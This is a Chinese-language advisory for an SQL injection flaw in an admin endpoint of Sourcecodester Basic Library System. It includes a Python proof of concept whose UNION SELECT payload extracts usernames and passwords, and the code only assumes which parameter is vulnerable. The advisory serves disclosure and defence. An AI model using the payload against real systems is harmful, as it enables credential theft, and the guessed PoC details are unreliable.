CVE-2026-36873 CVSS 2.7 低危

CVE-2026-36873: Basic Library System SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36873

漏洞类型

SQL注入

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Sourcecodester Basic Library System

漏洞概述

Sourcecodester Basic Library System v1.0 被发现存在SQL注入漏洞。攻击者可利用 /librarysystem/load_admin.php 接口中的输入验证缺失，通过构造恶意SQL语句篡改数据库查询。由于利用该漏洞需高权限，主要风险在于已认证的恶意管理员窃取敏感数据。此漏洞CVSS评分为2.7，属于低危级别。

技术细节

该漏洞的核心成因在于 `/librarysystem/load_admin.php` 文件对用户提交的参数缺乏严格的输入验证和转义处理，导致存在SQL注入风险。攻击者通过分析应用程序的数据库结构，构造特定的SQL Payload（例如利用 `UNION SELECT` 语句进行联合查询或基于时间的盲注）。根据CVSS向量分析，利用此漏洞具有较高的攻击复杂度且需要高权限（PR:H），意味着攻击者必须先持有合法的账户凭证（通常是管理员权限）才能向目标端点发送请求。一旦注入成功，攻击者可以绕过应用程序逻辑，直接从数据库后端提取敏感数据（如用户表、配置信息），从而窃取关键机密信息（C:L），但不会影响数据的完整性和系统的可用性。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的是 Sourcecodester Basic Library System v1.0，并定位到存在漏洞的接口 /librarysystem/load_admin.php。

STEP 2

获取凭证

由于漏洞需要高权限（PR:H），攻击者通过暴力破解、钓鱼或其他手段获取管理员账户的登录凭证。

STEP 3

构造载荷

攻击者构造包含恶意SQL代码的请求参数（如利用 UNION SELECT 语句），旨在提取数据库中的敏感信息。

STEP 4

执行注入

攻击者使用管理员会话向目标端点发送包含恶意载荷的HTTP请求，后端数据库执行注入语句并返回数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-36873
# Target: Sourcecodester Basic Library System v1.0
# Endpoint: /librarysystem/load_admin.php
import requests

target_url = "http://target-ip/librarysystem/load_admin.php"

# Required Administrator Session Cookies (PR:H)
cookies = {
    "PHPSESSID": "valid_admin_session_id_here",
    "user_level": "admin"
}

# Malicious payload to test SQL Injection
# Assuming the parameter 'id' is vulnerable
payload = "1' UNION SELECT 1,2,3,4,username,password FROM users-- -"

params = {
    "id": payload
}

try:
    response = requests.get(target_url, params=params, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check response for potential data leakage:")
        print(response.text[:500]) # Print first 500 chars for analysis
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print("[-] An error occurred:", str(e))

影响范围

Sourcecodester Basic Library System 1.0

防御指南

临时缓解措施

建议立即修复代码中的SQL注入缺陷，使用预处理语句重写 `/librarysystem/load_admin.php` 的数据库交互逻辑。在修复前，应严格限制管理员账户的使用，并加强网络边界防护，确保只有受信任的IP地址可以访问后台管理接口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表